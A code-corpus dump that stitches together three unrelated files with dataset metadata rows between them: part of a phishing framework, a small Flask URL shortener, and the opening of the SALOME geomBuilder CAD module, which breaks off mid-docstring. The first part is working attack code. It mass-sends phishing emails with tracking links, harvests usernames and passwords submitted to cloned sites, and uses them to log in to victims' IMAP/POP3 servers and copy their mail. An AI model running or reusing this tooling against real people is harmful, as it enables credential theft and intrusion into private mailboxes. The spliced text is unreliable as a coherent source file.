path = os.path.dirname(os.path.realpath(__file__))
# Start process
cmd = [path + "/../web.py", Utils.compressDict(self.config)]
self.webserver = subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE)
# monitor output to gather website information
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if line == 'Websites loaded and launched.':
break
if line != '':
self.display.verbose(line)
match=re.search("Started website", line)
VHOST = ""
PORT = ""
if match:
parts=line.split("[")
VHOST=parts[1].split("]")
VHOST=VHOST[0].strip()
PORT=parts[2].split("]")
PORT=PORT[0].strip()
PORT=PORT[7:]
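                        # PORT is assumed to arrive as "http://host:port"
                        # (format of web.py's "Started website" lines); the
                        # [7:] above strips the "http://" prefix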
# keep the URL clean
# if port is 80, then it does not need to be included in the URL
if (PORT[-3:] == ":80"):
PORT = PORT[:-3]
self.config[VHOST + "_port"] = PORT
self.config[VHOST + "_vhost"] = VHOST
Utils.screenCaptureWebSite("http://" + PORT,
self.outdir + "screenshots/" + PORT + "_" + VHOST + ".png")
Utils.screenCaptureWebSite("http://" + VHOST + "." + self.config["phishing_domain"],
self.outdir + "screenshots/" + VHOST + "." + self.config["phishing_domain"] + ".png")
# Write PID file
pidfilename = os.path.join(self.pid_path, "spfwebsrv.pid")
pidfile = open(pidfilename, 'w')
pidfile.write(str(self.webserver.pid))
pidfile.close()
self.webserverpid = self.webserver.pid
self.display.verbose("Started WebServer with pid = [%s]" % self.webserver.pid)
#----------------------------
# Build array of email templates
#----------------------------
def load_email_templates(self):
# do we even have targets?
if (((self.email_list is not None)
and (self.email_list))
and ((self.config["enable_email_sending"] == True)
or (self.config["simulate_email_sending"] == True))):
print
self.display.verbose("Locating phishing email templates")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
# loop over each email template
for f in os.listdir("templates/email/"):
template_file = os.path.join("templates/email/", f)
self.display.debug("Found the following email template: [%s]" % template_file)
if ((Utils.is_readable(template_file)) and (os.path.isfile(template_file))):
# read in the template SUBJECT, TYPE, and BODY
TYPE = ""
SUBJECT = ""
BODY = ""
with open (template_file, "r") as myfile:
for line in myfile.readlines():
match=re.search("TYPE=", line)
if match:
TYPE=line.replace('"', "")
TYPE=TYPE.split("=")
TYPE=TYPE[1].lower().strip()
match2=re.search("SUBJECT=", line)
if match2:
SUBJECT=line.replace('"', "")
SUBJECT=SUBJECT.split("=")
SUBJECT=SUBJECT[1].strip()
match3=re.search("BODY=", line)
if match3:
BODY=line.replace('"', "")
BODY=BODY.replace(r'\n', "\n")
BODY=BODY.split("=")
BODY=BODY[1].strip()
self.email_templates[TYPE].append(EmailTemplate(TYPE, SUBJECT, BODY))
#----------------------------
# Generate/Send phishing emails
#----------------------------
def send_emails(self):
# are required flags set?
if ((self.config["enable_email_sending"] == True) or (self.config["simulate_email_sending"] == True)):
if ((self.config["determine_smtp"] == "1") and (self.config["use_specific_smtp"] == "1")):
self.display.error("ONLY 1 of DETERMINE_SMTP or USE_SPECIFIC_SMTP can be enabled at a time.")
else:
print
self.display.output("Sending phishing emails")
if (self.config["always_yes"] or self.display.yn("Continue", default="y")):
templates_logged = []
                    # do we have any emails to send?
if self.email_list:
temp_target_list = self.email_list
temp_delay = 1
if (self.config["email_delay"] is not None):
temp_delay = int(self.config["email_delay"])
send_count = 0
                        # while there are still target email addresses, loop
while (temp_target_list and (send_count < (int(self.config["emails_max"])))):
# inc number of emails we have attempted to send
send_count = send_count + 1
# delay requested amount of time between sending emails
time.sleep(temp_delay)
# for each type of email (citrix, owa, office365, ...)
for key in self.email_templates:
# double check
if temp_target_list:
# for each email template of the given type
for template in self.email_templates[key]:
# double check
if temp_target_list:
# grab a new target email address
target = temp_target_list.pop(0)
self.display.verbose("Sending Email to [%s]" % target)
#FROM = "support@" + self.config["phishing_domain"]
FROM = self.config["smtp_fromaddr"]
SUBJECT = template.getSUBJECT()
BODY = template.getBODY()
# perform necessary SEARCH/REPLACE
if self.config["enable_host_based_vhosts"] == "1":
targetlink="http://" + key + "." + self.config["phishing_domain"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
else:
if (not key == "dynamic"):
targetlink="http://" + self.config[key+ "_port"]
if self.config["enable_user_tracking"] == "1":
targetlink += "?u=" + self.db.getUserTrackId(target)
BODY=BODY.replace(r'[[TARGET]]', targetlink)
# log
if (key not in templates_logged):
self.display.log("----------------------------------------------\n\n" +
"TO: <XXXXX>\n" +
"FROM: " + FROM + "\n" +
"SUBJECT: " + SUBJECT + "\n\n" +
BODY + "\n\n" +
"----------------------------------------------\n\n" +
"TARGETS:\n" +
"--------\n",
filename="email_template_" + key + ".txt")
templates_logged.append(key)
self.display.log(target + "\n", filename="email_template_" + key + ".txt")
# send the email
if (self.config["simulate_email_sending"] == True):
self.display.output("Would have sent an email to [%s] with subject of [%s], but this was just a test." % (target, SUBJECT))
else:
try:
if self.config["determine_smtp"] == "1":
emails.send_email_direct(target,
FROM,
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
if self.config["use_specific_smtp"] == "1":
print self.config["smtp_fromaddr"]
emails.send_email_account(self.config["smtp_server"],
int(self.config["smtp_port"]),
self.config["smtp_user"],
self.config["smtp_pass"],
target,
self.config["smtp_fromaddr"],
self.config["smtp_displayname"],
SUBJECT,
BODY,
debug=True)
except:
self.display.error("Count not send email to " + target)
#----------------------------
# Monitor web sites
#----------------------------
def monitor_results(self):
# are required flags set?
if self.config["enable_web"] == True:
print
self.display.output("Monitoring phishing website activity!")
self.display.alert("(Press CTRL-C to stop collection and generate report!)")
if (self.webserver):
while True:
line = self.webserver.stdout.readline()
line = line.strip()
if (self.config["pillage_email"]):
self.pillage(line)
self.display.output(line)
#==================================================
# Secondary METHODS
#==================================================
#----------------------------
# Pillage Emails
#----------------------------
def pillage(self, line):
username = None
password = None
# parse line into username/password
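        # a line is expected to carry fields such as username=['...'] and
        # password=['...'], e.g. "... username=['alice'] password=['s3cret'] ..."
        # (assumed format of the captured web form POST data)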
usermatch = re.match(".*username=\['(.*?)'\].*", line)
if (usermatch):
username = usermatch.group(1)
passmatch = re.match(".*password=\['(.*?)'\].*", line)
if (passmatch):
password = passmatch.group(1)
# if no username or password, then return
if ((not username) or (not password)):
return
# is it a new username/password pair we have not seen before?
if (not username+":"+password in self.pillaged_users):
self.pillaged_users.append(username+":"+password)
# make a new MailPillager if one does not exist
if (not self.mp):
self.mp = MailPillager()
# attempt to determine the best Mail Server to use
if (not self.bestMailServer):
self.determineBestMailServer()
# if no Best Mail Server was identified, return
if (not self.bestMailServer):
self.display.error("No valid target IMAP/POP3 mail servers were identified.")
return
#print self.bestMailServer + ":" + str(self.bestMailServerPort)
# PILLAGE!!!
self.mp.pillage(username=username, password=password, server=self.bestMailServer,
port=self.bestMailServerPort, domain=self.config["domain_name"], outputdir=self.outdir + "pillage_data/")
#----------------------------
# See which Mail Server we should use
#
# TODO: needs to be updated!!!
#----------------------------
def determineBestMailServer(self):
if self.server_list[993]: # IMAPS
self.bestMailServerPort = 993
self.bestMailServer = self.server_list[993][0]
elif self.server_list[143]: #IMAP
self.bestMailServerPort = 143
self.bestMailServer = self.server_list[143][0]
elif self.server_list[995]: # POP3S
self.bestMailServerPort = 995
self.bestMailServer = self.server_list[995][0]
elif self.server_list[110]: # POP3
self.bestMailServerPort = 110
self.bestMailServer = self.server_list[110][0]
#==========================================================================================
#==========================================================================================
#==========================================================================================
#----------------------------
# Primary METHOD
#----------------------------
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
# make directories
if not os.path.isdir(self.outdir + "reports/"):
os.makedirs(self.outdir + "reports/")
if not os.path.isdir(self.outdir + "logs/"):
os.makedirs(self.outdir + "logs/")
if not os.path.isdir(self.outdir + "screenshots/"):
os.makedirs(self.outdir + "screenshots/")
if not os.path.isdir(self.outdir + "web_clones/"):
os.makedirs(self.outdir + "web_clones/")
if not os.path.isdir(self.outdir + "pillage_data/"):
os.makedirs(self.outdir + "pillage_data/")
# dns/portscan/cloning
self.gather_dns()
self.port_scan()
self.profile_site()
# load websites
self.load_websites()
# do email stuff
self.prep_email()
self.load_email_templates()
self.send_emails()
# sit back and listen
self.monitor_results()
| bsd-3-clause | -8,369,864,212,482,959,000 | 47.741036 | 171 | 0.462257 | false |
aa-m-sa/summer-url-py | summerurlapp.py | 1 | 4031 | # a small URL shortening service
import psycopg2 # for persistent storage on Heroku
from flask import Flask, request, Response, g, redirect, url_for, abort, render_template
from contextlib import closing
import os
import urlparse
import appconfig
import shortenid
APPSETTINGS_ENVVAR = 'SUMMER_APP_CONFIG'
app = Flask(__name__)
app.config.from_object(appconfig.DevelopmentConfig)
# override with env var (if it's been set)
app.config.from_object(os.environ[APPSETTINGS_ENVVAR])
def connect_db():
"""Connect to the database.
:returns: db connection obj
"""
if not app.config['DATABASE_URL']:
raise Exception('Database URL not set!')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(app.config['DATABASE_URL'])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
return conn
def init_db():
"""Utility function to initialize the database with schema.sql.
"""
with connect_db() as conn:
with conn.cursor() as curs:
with open("schema.sql", "r") as sch_file:
curs.execute(sch_file.read())
conn.commit()
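# Note: schema.sql is assumed to define a table along the lines of:
#   CREATE TABLE urls (id serial PRIMARY KEY, url text NOT NULL);
# which matches the "insert into urls (url) ... returning id" query below.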
@app.before_request
def before_request():
g.db = connect_db()
@app.teardown_request
def teardown_request(exception):
db = getattr(g, 'db', None)
if db is not None:
db.close()
# routes:
# web views
@app.route('/', methods=['GET', 'POST'])
def main_page():
"""For GET request, show the webapp main page. For POST request, let
shorten() take care of shortening and show the shortened url"""
if request.method == 'GET':
return render_template('mainpage.html')
else:
        textid = shorten().get_data()  # the full response body is the text id
short_url = url_for('get_link', textid = textid, _external=True)
return render_template('shortened.html', shortened = short_url)
@app.route('/api/')
def api_description():
"""Show the api description page"""
return render_template('api_description.html')
# the underlying (public) api
@app.route('/api/shorten', methods=['POST'])
def shorten():
"""Shorten the URL contained in the parameter link, by
assigning an unique id to link and store both in the db.
:returns: text/plain Response object.
"""
if request.headers.get('Content-Type') != 'application/x-www-form-urlencoded':
raise Exception("received POST request Content-Type doesn't conform to API.")
# how this will work internally:
# db rows: id (integer), text (url)
# new link -> id++, add to db
# this ensures that two different links will not get the same id
# each integer id is mapped into an ASCII string (which is returned)
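    # e.g. with a base-62 style alphabet, shortenid.to_text(125) could yield a
    # short string like "cb", and shortenid.to_int("cb") maps it back to 125
    # (the exact alphabet is defined in the shortenid module)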
cur = g.db.cursor()
rawlink = request.form['link']
# crude but works in most cases
# TODO url normalization with urlnorm?
if not urlparse.urlparse(rawlink)[0]:
alink = 'http://' + rawlink
else:
alink = rawlink
cur.execute('insert into urls (url) values (%s) returning id', [alink])
g.db.commit()
idinteger = cur.fetchone()
if not idinteger:
raise Exception('inserting url into db failed')
textid = shortenid.to_text(idinteger[0])
return Response(textid, mimetype='text/plain')
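# Example client call (a sketch, assuming the app runs on localhost:5000):
#   curl -d "link=example.com" http://localhost:5000/api/shorten
# returns a plain-text id such as "b"; GET /api/b then issues a 301 redirect
# to http://example.com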
@app.route('/api/<textid>', methods=['GET'])
def get_link(textid):
"""Redirect to the previously stored url, indentified by id.
:textid: the id
:returns: a redirect to the corresponding url
"""
# parse text id to integer
# fetch the url for that key from db
cur = g.db.cursor()
try:
integer_id = shortenid.to_int(textid)
except ValueError:
# current implementation returns only ids that can be converted to int
abort(404)
cur.execute('select url from urls where id = %s', [integer_id])
orig_url = cur.fetchone()
if not orig_url:
abort(404)
return redirect(orig_url[0], code=301)
if __name__ == '__main__':
app.run()
| mit | -2,764,560,846,763,436,500 | 26.609589 | 88 | 0.649219 | false |
FedoraScientific/salome-geom | src/GEOM_SWIG/geomBuilder.py | 1 | 644045 | # -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2014 CEA/DEN, EDF R&D, OPEN CASCADE
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : [email protected]
#
# GEOM GEOM_SWIG : binding of C++ implementation with Python
# File : geomBuilder.py
# Author : Paul RASCLE, EDF
# Module : GEOM
"""
\namespace geomBuilder
\brief Module geomBuilder
"""
##
## @defgroup geomBuilder geomBuilder Python module
## @{
##
## @details
##
## By default, all functions of geomBuilder Python module do not publish
## resulting geometrical objects. This can be done in the Python script
## by means of \ref geomBuilder.geomBuilder.addToStudy() "addToStudy()"
## or \ref geomBuilder.geomBuilder.addToStudyInFather() "addToStudyInFather()"
## functions.
##
## However, it is possible to publish result data in the study
## automatically. For this, almost each function of
## \ref geomBuilder.geomBuilder "geomBuilder" class has
## an additional @a theName parameter (@c None by default).
## As soon as non-empty string value is passed to this parameter,
## the result object is published in the study automatically.
##
## For example, consider the following Python script:
##
## @code
## import salome
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## box = geompy.MakeBoxDXDYDZ(100, 100, 100) # box is not published in the study yet
## geompy.addToStudy(box, "box") # explicit publishing
## @endcode
##
## Last two lines can be replaced by one-line instruction:
##
## @code
## box = geompy.MakeBoxDXDYDZ(100, 100, 100, theName="box") # box is published in the study with "box" name
## @endcode
##
## ... or simply
##
## @code
## box = geompy.MakeBoxDXDYDZ(100, 100, 100, "box") # box is published in the study with "box" name
## @endcode
##
## Note that some functions produce more than one geometrical object. For example,
## \ref geomBuilder.geomBuilder.GetNonBlocks() "GetNonBlocks()" function returns two objects:
## group of all non-hexa solids and group of all non-quad faces.
## For such functions it is possible to specify separate names for results.
##
## For example
##
## @code
## # create and publish cylinder
## cyl = geompy.MakeCylinderRH(100, 100, "cylinder")
## # get non blocks from cylinder
## g1, g2 = geompy.GetNonBlocks(cyl, "nonblock")
## @endcode
##
## Above example will publish both result compounds (first with non-hexa solids and
## second with non-quad faces) as two items, both named "nonblock".
## However, if second command is invoked as
##
## @code
## g1, g2 = geompy.GetNonBlocks(cyl, ("nonhexa", "nonquad"))
## @endcode
##
## ... the first compound will be published with "nonhexa" name, and second will be named "nonquad".
##
## Automatic publication of all results can be also enabled/disabled by means of the function
## \ref geomBuilder.geomBuilder.addToStudyAuto() "addToStudyAuto()". The automatic publishing
## is managed by the numeric parameter passed to this function:
## - if @a maxNbSubShapes = 0, automatic publishing is disabled.
## - if @a maxNbSubShapes = -1 (default), automatic publishing is enabled and
## maximum number of sub-shapes allowed for publishing is unlimited; any negative
## value passed as parameter has the same effect.
## - if @a maxNbSubShapes is any positive value, automatic publishing is enabled and
## maximum number of sub-shapes allowed for publishing is set to specified value.
##
## When automatic publishing is enabled, you do not even need to pass the @a theName parameter
## to the functions creating objects; default names will be used instead. However, you
## can always change the behavior by passing an explicit name to the @a theName parameter,
## and it will be used instead of the default one.
## The publishing of the collections of objects will be done according to the above
## mentioned rules (maximum allowed number of sub-shapes).
##
## For example:
##
## @code
## import salome
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## geompy.addToStudyAuto() # enable automatic publication
## box = geompy.MakeBoxDXDYDZ(100, 100, 100)
## # the box is created and published in the study with default name
## geompy.addToStudyAuto(5) # set max allowed number of sub-shapes to 5
## vertices = geompy.SubShapeAll(box, geomBuilder.ShapeType['VERTEX'])
## # only the first 5 vertices will be published, with default names
## print len(vertices)
## # note that the result value still contains all 8 vertices
## geompy.addToStudyAuto(-1) # disable automatic publication
## @endcode
##
## This feature can be used, for example, for debugging purposes.
##
## @note
## - Use automatic publication feature with caution. When it is enabled, any function of
## \ref geomBuilder.geomBuilder "geomBuilder" class publishes the results in the study,
## which can lead to a huge study data tree.
## For example, repeatedly calling the \ref geomBuilder.geomBuilder.SubShapeAll() "SubShapeAll()"
## command on the same main shape will publish all child objects each time, leading
## to a lot of duplicated items in the study.
## - Sub-shapes are automatically published as child items of the parent main shape in the study if main
## shape was also published before. Otherwise, sub-shapes are published as top-level objects.
## - Some functions of \ref geomBuilder.geomBuilder "geomBuilder" class do not have
## \a theName parameter (and, thus, do not support automatic publication).
## For example, some transformation operations like
## \ref geomBuilder.geomBuilder.TranslateDXDYDZ() "TranslateDXDYDZ()".
## Refer to the documentation to check if some function has such possibility.
##
## It is possible to customize the representation of the geometrical
## data in the data tree; this can be done by using folders. A folder can
## be created in the study tree using function
## \ref geomBuilder.geomBuilder.NewFolder() "NewFolder()"
## (by default it is created under the "Geometry" root object).
## As soon as a folder is created, any published geometry object
## can be moved into it.
##
## For example:
##
## @code
## import salome
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## box = geompy.MakeBoxDXDYDZ(100, 100, 100, "Box")
## # the box was created and published in the study
## folder = geompy.NewFolder("Primitives")
## # an empty "Primitives" folder was created under default "Geometry" root object
## geompy.PutToFolder(box, folder)
## # the box was moved into "Primitives" folder
## @endcode
##
## Subfolders can also be created by specifying another folder as a parent:
##
## @code
## subfolder = geompy.NewFolder("3D", folder)
## # "3D" folder was created under "Primitives" folder
## @endcode
##
## @note
## - Folder container is just a representation layer object that
## deals with already published objects only. So, any geometry object
## should be published in the study (for example, with
## \ref geomBuilder.geomBuilder.addToStudy() "addToStudy()" function)
## BEFORE moving it into any existing folder.
## - \ref geomBuilder.geomBuilder.PutToFolder() "PutToFolder()" function
## does not change the physical position of the geometry object in the study tree,
## it only affects the representation of the data tree.
## - It is impossible to publish a geometry object using any folder as its father.
##
## \defgroup l1_publish_data
## \defgroup l1_geomBuilder_auxiliary
## \defgroup l1_geomBuilder_purpose
## @}
## @defgroup l1_publish_data Publishing results in SALOME study
## @defgroup l1_geomBuilder_auxiliary Auxiliary data structures and methods
## @defgroup l1_geomBuilder_purpose All package methods, grouped by their purpose
## @{
## @defgroup l2_import_export Importing/exporting geometrical objects
## @defgroup l2_creating Creating geometrical objects
## @{
## @defgroup l3_basic_go Creating Basic Geometric Objects
## @{
## @defgroup l4_curves Creating Curves
## @}
## @defgroup l3_3d_primitives Creating 3D Primitives
## @defgroup l3_complex Creating Complex Objects
## @defgroup l3_groups Working with groups
## @defgroup l3_blocks Building by blocks
## @{
## @defgroup l4_blocks_measure Check and Improve
## @}
## @defgroup l3_sketcher Sketcher
## @defgroup l3_advanced Creating Advanced Geometrical Objects
## @{
## @defgroup l4_decompose Decompose objects
## @defgroup l4_decompose_d Decompose objects deprecated methods
## @defgroup l4_access Access to sub-shapes by their unique IDs inside the main shape
##     @defgroup l4_obtain Access to sub-shapes by criteria
## @defgroup l4_advanced Advanced objects creation functions
## @}
## @}
## @defgroup l2_transforming Transforming geometrical objects
## @{
## @defgroup l3_basic_op Basic Operations
## @defgroup l3_boolean Boolean Operations
## @defgroup l3_transform Transformation Operations
## @defgroup l3_transform_d Transformation Operations deprecated methods
## @defgroup l3_local Local Operations (Fillet, Chamfer and other Features)
## @defgroup l3_blocks_op Blocks Operations
## @defgroup l3_healing Repairing Operations
## @defgroup l3_restore_ss Restore presentation parameters and a tree of sub-shapes
## @}
## @defgroup l2_measure Using measurement tools
## @defgroup l2_field Field on Geometry
## @}
# initialize SALOME session in try/except block
# to avoid problems in some cases, e.g. when generating documentation
try:
import salome
salome.salome_init()
from salome import *
except:
pass
from salome_notebook import *
import GEOM
import math
import os
import functools
from salome.geom.gsketcher import Sketcher3D, Sketcher2D, Polyline2D
# service function
def _toListOfNames(_names, _size=-1):
l = []
import types
if type(_names) in [types.ListType, types.TupleType]:
for i in _names: l.append(i)
elif _names:
l.append(_names)
if l and len(l) < _size:
for i in range(len(l), _size): l.append("%s_%d"%(l[0],i))
return l
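# e.g. _toListOfNames("a", 3) returns ["a", "a_1", "a_2"]:
# a single name is padded with indexed variants up to the requested size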
# Decorator function to manage transactions for all geometric operations.
def ManageTransactions(theOpeName):
def MTDecorator(theFunction):
# To keep the original function name an documentation.
@functools.wraps(theFunction)
def OpenCallClose(self, *args, **kwargs):
# Open transaction
anOperation = getattr(self, theOpeName)
anOperation.StartOperation()
try:
# Call the function
res = theFunction(self, *args, **kwargs)
# Commit transaction
anOperation.FinishOperation()
return res
except:
# Abort transaction
anOperation.AbortOperation()
raise
return OpenCallClose
return MTDecorator
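# Example usage (a sketch; "BasicOp" is one of the operation attributes
# initialized in geomBuilder.init_geom()):
#
#     @ManageTransactions("BasicOp")
#     def MakeSomething(self, ...):
#         ...
#
# each call is then wrapped in StartOperation()/FinishOperation(), with
# AbortOperation() invoked if an exception escapes the function.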
## Raise an error, containing the Method_name, if the Operation has failed
## @ingroup l1_geomBuilder_auxiliary
def RaiseIfFailed (Method_name, Operation):
if Operation.IsDone() == 0 and Operation.GetErrorCode() != "NOT_FOUND_ANY":
raise RuntimeError, Method_name + " : " + Operation.GetErrorCode()
## Return list of parameter values, resolving salome notebook variables
## @ingroup l1_geomBuilder_auxiliary
def ParseParameters(*parameters):
Result = []
StringResult = []
for parameter in parameters:
if isinstance(parameter, list):
lResults = ParseParameters(*parameter)
if len(lResults) > 0:
Result.append(lResults[:-1])
StringResult += lResults[-1].split(":")
pass
pass
else:
if isinstance(parameter,str):
if notebook.isVariable(parameter):
Result.append(notebook.get(parameter))
else:
raise RuntimeError, "Variable with name '" + parameter + "' doesn't exist!!!"
pass
else:
Result.append(parameter)
pass
StringResult.append(str(parameter))
pass
pass
if Result:
Result.append(":".join(StringResult))
else:
Result = ":".join(StringResult)
return Result
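# Example (a sketch, assuming a notebook variable "Length" with value 100.):
#   ParseParameters(10, "Length") returns [10, 100., "10:Length"], i.e. the
#   resolved values followed by a ':'-joined string of the original textual
#   parameters, suitable for later SetParameters() calls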
## Return list of values and their string representation, resolving salome notebook variables
## @ingroup l1_geomBuilder_auxiliary
def ParseList(list):
Result = []
StringResult = ""
for parameter in list:
if isinstance(parameter,str) and notebook.isVariable(parameter):
Result.append(str(notebook.get(parameter)))
pass
else:
Result.append(str(parameter))
pass
StringResult = StringResult + str(parameter)
StringResult = StringResult + ":"
pass
StringResult = StringResult[:len(StringResult)-1]
return Result, StringResult
## Resolve salome notebook variables in the given sketcher command
## @ingroup l1_geomBuilder_auxiliary
def ParseSketcherCommand(command):
Result = ""
StringResult = ""
sections = command.split(":")
for section in sections:
parameters = section.split(" ")
paramIndex = 1
for parameter in parameters:
if paramIndex > 1 and parameter.find("'") != -1:
parameter = parameter.replace("'","")
if notebook.isVariable(parameter):
Result = Result + str(notebook.get(parameter)) + " "
pass
else:
raise RuntimeError, "Variable with name '" + parameter + "' doesn't exist!!!"
pass
pass
else:
Result = Result + str(parameter) + " "
pass
if paramIndex > 1:
StringResult = StringResult + parameter
StringResult = StringResult + ":"
pass
paramIndex = paramIndex + 1
pass
Result = Result[:len(Result)-1] + ":"
pass
Result = Result[:len(Result)-1]
return Result, StringResult
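# Example (a sketch, assuming notebook variables "X" and "Y" with values 1 and 2):
#   ParseSketcherCommand("Sketcher:F 'X' 'Y'") returns ("Sketcher:F 1 2", "X:Y:"):
#   quoted parameters are substituted by their notebook values, while the raw
#   variable names are collected into the second, ':'-separated string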
## Helper function which can be used to pack the passed string to the byte data.
## Only '1' and '0' symbols are valid for the string. The missing bits are replaced by zeroes.
## If the string contains invalid symbol (neither '1' nor '0'), the function raises an exception.
## For example,
## \code
## val = PackData("10001110") # val = 0xAE
## val = PackData("1") # val = 0x80
## \endcode
## @param data unpacked data - a string containing '1' and '0' symbols
## @return data packed to the byte stream
## @ingroup l1_geomBuilder_auxiliary
def PackData(data):
"""
Helper function which can be used to pack the passed string to the byte data.
    Only '1' and '0' symbols are valid for the string. The missing bits are replaced by zeroes.
If the string contains invalid symbol (neither '1' nor '0'), the function raises an exception.
Parameters:
data unpacked data - a string containing '1' and '0' symbols
Returns:
data packed to the byte stream
Example of usage:
val = PackData("10001110") # val = 0xAE
val = PackData("1") # val = 0x80
"""
bytes = len(data)/8
if len(data)%8: bytes += 1
res = ""
for b in range(bytes):
d = data[b*8:(b+1)*8]
val = 0
for i in range(8):
val *= 2
if i < len(d):
if d[i] == "1": val += 1
elif d[i] != "0":
raise "Invalid symbol %s" % d[i]
pass
pass
res += chr(val)
pass
return res
## Read bitmap texture from the text file.
## In that file, any non-zero symbol represents '1' opaque pixel of the bitmap.
## A zero symbol ('0') represents transparent pixel of the texture bitmap.
## The function returns width and height of the pixmap in pixels and byte stream representing
## texture bitmap itself.
##
## This function can be used to read the texture to the byte stream in order to pass it to
## the AddTexture() function of geomBuilder class.
## For example,
## \code
## from salome.geom import geomBuilder
## geompy = geomBuilder.New(salome.myStudy)
## texture = geompy.readtexture('mytexture.dat')
## texture = geompy.AddTexture(*texture)
## obj.SetMarkerTexture(texture)
## \endcode
## @param fname texture file name
## @return sequence of three values: texture's width, height in pixels and its byte stream
## @ingroup l1_geomBuilder_auxiliary
def ReadTexture(fname):
"""
Read bitmap texture from the text file.
In that file, any non-zero symbol represents '1' opaque pixel of the bitmap.
A zero symbol ('0') represents transparent pixel of the texture bitmap.
The function returns width and height of the pixmap in pixels and byte stream representing
texture bitmap itself.
This function can be used to read the texture to the byte stream in order to pass it to
the AddTexture() function of geomBuilder class.
Parameters:
fname texture file name
Returns:
        sequence of three values: texture's width, height in pixels and its byte stream
Example of usage:
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
texture = geompy.readtexture('mytexture.dat')
texture = geompy.AddTexture(*texture)
obj.SetMarkerTexture(texture)
"""
try:
f = open(fname)
lines = [ l.strip() for l in f.readlines()]
f.close()
maxlen = 0
if lines: maxlen = max([len(x) for x in lines])
lenbytes = maxlen/8
if maxlen%8: lenbytes += 1
bytedata=""
for line in lines:
if len(line)%8:
lenline = (len(line)/8+1)*8
pass
else:
lenline = (len(line)/8)*8
pass
for i in range(lenline/8):
byte=""
for j in range(8):
if i*8+j < len(line) and line[i*8+j] != "0": byte += "1"
else: byte += "0"
pass
bytedata += PackData(byte)
pass
for i in range(lenline/8, lenbytes):
bytedata += PackData("0")
pass
return lenbytes*8, len(lines), bytedata
except:
pass
return 0, 0, ""
## Returns a long value from enumeration type
# Can be used for CORBA enumerator types like GEOM.shape_type
# @param theItem enumeration type
# @ingroup l1_geomBuilder_auxiliary
def EnumToLong(theItem):
"""
Returns a long value from enumeration type
    Can be used for CORBA enumerator types like GEOM.shape_type
Parameters:
theItem enumeration type
"""
ret = theItem
if hasattr(theItem, "_v"): ret = theItem._v
return ret
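# e.g. EnumToLong(GEOM.FACE) is expected to return 4, since a CORBA enum item
# carries its numeric value in the "_v" attribute (plain integers are returned
# unchanged)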
## Information about closed/unclosed state of shell or wire
# @ingroup l1_geomBuilder_auxiliary
class info:
"""
Information about closed/unclosed state of shell or wire
"""
UNKNOWN = 0
CLOSED = 1
UNCLOSED = 2
## Private class used to bind calls of plugin operations to geomBuilder
class PluginOperation:
def __init__(self, operation, function):
self.operation = operation
self.function = function
pass
@ManageTransactions("operation")
def __call__(self, *args):
res = self.function(self.operation, *args)
RaiseIfFailed(self.function.__name__, self.operation)
return res
# Warning: geom is a singleton
geom = None
engine = None
doLcc = False
created = False
class geomBuilder(object, GEOM._objref_GEOM_Gen):
## Enumeration ShapeType as a dictionary. \n
## Topological types of shapes (like Open Cascade types). See GEOM::shape_type for details.
# @ingroup l1_geomBuilder_auxiliary
ShapeType = {"AUTO":-1, "COMPOUND":0, "COMPSOLID":1, "SOLID":2, "SHELL":3, "FACE":4, "WIRE":5, "EDGE":6, "VERTEX":7, "SHAPE":8}
## Kinds of shape in terms of <VAR>GEOM.GEOM_IKindOfShape.shape_kind</VAR> enumeration
# and a list of parameters, describing the shape.
# List of parameters, describing the shape:
# - COMPOUND: [nb_solids nb_faces nb_edges nb_vertices]
# - COMPSOLID: [nb_solids nb_faces nb_edges nb_vertices]
#
# - SHELL: [info.CLOSED / info.UNCLOSED nb_faces nb_edges nb_vertices]
#
# - WIRE: [info.CLOSED / info.UNCLOSED nb_edges nb_vertices]
#
# - SPHERE: [xc yc zc R]
# - CYLINDER: [xb yb zb dx dy dz R H]
# - BOX: [xc yc zc ax ay az]
# - ROTATED_BOX: [xc yc zc zx zy zz xx xy xz ax ay az]
# - TORUS: [xc yc zc dx dy dz R_1 R_2]
# - CONE: [xb yb zb dx dy dz R_1 R_2 H]
# - POLYHEDRON: [nb_faces nb_edges nb_vertices]
# - SOLID: [nb_faces nb_edges nb_vertices]
#
# - SPHERE2D: [xc yc zc R]
# - CYLINDER2D: [xb yb zb dx dy dz R H]
# - TORUS2D: [xc yc zc dx dy dz R_1 R_2]
# - CONE2D: [xc yc zc dx dy dz R_1 R_2 H]
# - DISK_CIRCLE: [xc yc zc dx dy dz R]
# - DISK_ELLIPSE: [xc yc zc dx dy dz R_1 R_2]
# - POLYGON: [xo yo zo dx dy dz nb_edges nb_vertices]
# - PLANE: [xo yo zo dx dy dz]
# - PLANAR: [xo yo zo dx dy dz nb_edges nb_vertices]
# - FACE: [nb_edges nb_vertices]
#
# - CIRCLE: [xc yc zc dx dy dz R]
# - ARC_CIRCLE: [xc yc zc dx dy dz R x1 y1 z1 x2 y2 z2]
# - ELLIPSE: [xc yc zc dx dy dz R_1 R_2]
# - ARC_ELLIPSE: [xc yc zc dx dy dz R_1 R_2 x1 y1 z1 x2 y2 z2]
# - LINE: [xo yo zo dx dy dz]
# - SEGMENT: [x1 y1 z1 x2 y2 z2]
# - EDGE: [nb_vertices]
#
